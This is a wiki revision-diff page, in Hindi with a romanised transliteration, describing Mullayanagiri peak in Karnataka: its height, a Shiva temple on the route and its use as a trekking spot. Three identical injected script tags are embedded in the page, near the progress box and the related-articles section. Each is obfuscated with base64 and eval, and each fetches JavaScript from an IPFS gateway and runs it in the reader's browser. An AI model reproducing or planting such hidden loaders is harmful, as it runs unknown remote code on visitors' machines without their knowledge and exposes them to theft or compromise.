Difference between revisions of "मुल्लयनगिरि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मुल्लयनगिरी''' कर्नाटक में स्थित [[बाबाबूदान की पह...' के साथ नया पन्ना बनाया)
 
Line 2: Line 2:
  
 
*[[चिकमंगलूर]] शहर से 16 कि.मी. की दूरी पर मुल्लयनगिरि स्थित है।
 
*[[चिकमंगलूर]] शहर से 16 कि.मी. की दूरी पर मुल्लयनगिरि स्थित है।
*इस पहाड़ी के रास्ते में 'सीतालयनगिरी' है, जहाँ भगवान [[शिव]] का एक मन्दिर भी है। इस मंदिर की विशेषता यह है कि इसका पानी न तो कम होता है और न ही बढ़ता है। पहाड़ी की चोटी पर एक छोटा-सा अन्य मंदिर भी है।
+
*इस पहाड़ी के रास्ते में 'सीतालयनगिरी' है, जहाँ भगवान [[शिव]] का एक मन्दिर भी है।
 +
*यहाँ के मंदिर की विशेषता यह है कि इसका पानी न तो कम होता है और न ही बढ़ता है। पहाड़ी की चोटी पर एक छोटा-सा अन्य मंदिर भी है।
 
*साफ मौसम में मुल्ल्यनगिरि के सबसे ऊँचे बिंदु से [[अरब सागर]] दिखाई देता है।
 
*साफ मौसम में मुल्ल्यनगिरि के सबसे ऊँचे बिंदु से [[अरब सागर]] दिखाई देता है।
 
*मुल्लयनगिरि [[कर्नाटक]] का प्रमुख ट्रैकिंग स्पॉट है।
 
*मुल्लयनगिरि [[कर्नाटक]] का प्रमुख ट्रैकिंग स्पॉट है।

Revision as of 10:21, 8 August 2012

mullayanagiri karnatak mean sthit bababoodan parvat shrriankhala ka hi ek bhag hai. 1,930 mitar ki ooanchaee par sthit mullayanagiri, karnatak ki sabase ooanchi choti hai. yahaan se sooryast ka najara b da hi manoram dikhaee deta hai.

  • chikamangaloor shahar se 16 ki.mi. ki doori par mullayanagiri sthit hai.
  • is paha di ke raste mean 'sitalayanagiri' hai, jahaan bhagavan shiv ka ek mandir bhi hai.
  • yahaan ke mandir ki visheshata yah hai ki isaka pani n to kam hota hai aur n hi badhata hai. paha di ki choti par ek chhota-sa any mandir bhi hai.
  • saph mausam mean mullyanagiri ke sabase ooanche biandu se arab sagar dikhaee deta hai.
  • mullayanagiri karnatak ka pramukh traikiang sp aaut hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>